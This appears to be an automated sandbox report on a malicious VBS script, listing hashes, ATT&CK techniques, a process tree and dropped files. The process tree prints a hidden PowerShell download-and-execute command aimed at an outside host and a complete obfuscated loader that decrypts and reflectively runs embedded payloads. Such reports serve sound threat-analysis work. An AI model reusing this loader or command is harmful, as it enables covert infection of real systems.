9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

General

Target

9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs
Size

79KB
MD5

c0e2ce250c4979a59970d22fd99f340f
SHA1

4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0
SHA256

9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2
SHA512

f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404
SSDEEP

1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2372	powershell.exe
2612	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2372	powershell.exe
2612	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	2612	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2112 wrote to memory of 2372	2112	WScript.exe	30
PID 2112 wrote to memory of 2372	2112	WScript.exe	30
PID 2112 wrote to memory of 2372	2112	WScript.exe	30
PID 2112 wrote to memory of 2712	2112	WScript.exe	33
PID 2112 wrote to memory of 2712	2112	WScript.exe	33
PID 2112 wrote to memory of 2712	2112	WScript.exe	33
PID 2712 wrote to memory of 2604	2712	cmd.exe	35
PID 2712 wrote to memory of 2604	2712	cmd.exe	35
PID 2712 wrote to memory of 2604	2712	cmd.exe	35
PID 2712 wrote to memory of 2612	2712	cmd.exe	36
PID 2712 wrote to memory of 2612	2712	cmd.exe	36
PID 2712 wrote to memory of 2612	2712	cmd.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
8078d12b395b01ad397cec896ae02a6a

SHA1
2a5b18660c4b2b40969651ca16a1ede64f3aecf5

SHA256
0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

SHA512
df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
298ca7c6f33bdbbd346414f2870aefc5

SHA1
b3b31d85b1143f2c993f8e14fe2eed6bf61ead0c

SHA256
d4f6aac68537f13e6052e2ad564dd70f462ed802a2ab7ffec200bca5f8b51b9c

SHA512
71250218f097a0620cab06a867a234c1098d8295da8529f4a8c2b17ad0585cbe17eafc46951dbd4963746fc493918362eff36cb1f1b9aa994da458c648c976cf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U3757X3BY6P979HJT92E.temp

Filesize
7KB

MD5
215676f1d75a5f14d9195feae7cdd2da

SHA1
708555f4b17c390d047865f9554b9eba6ab361b6

SHA256
f27fc615215e5f3af4f5060f3d98f4a673a78c0ee5a3ad6e465be53c087c139d

SHA512
9d435d2d6b6e91ff1c17011771a4210d3fbf4abf496b6e3f3c722e07c322b9b1cb0059aa9daf9cf381c0bc62747f39b51146fcd7458b1edbd31efebe31041c3e

Download Submit
memory/2372-6-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

Filesize
32KB

Download
memory/2372-8-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-10-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-9-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-11-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-12-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-4-0x000007FEF5D0E000-0x000007FEF5D0F000-memory.dmp

Filesize
4KB

Download
memory/2372-7-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

Filesize
9.6MB

Download
memory/2372-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2612-27-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2612-28-0x0000000002000000-0x0000000002008000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing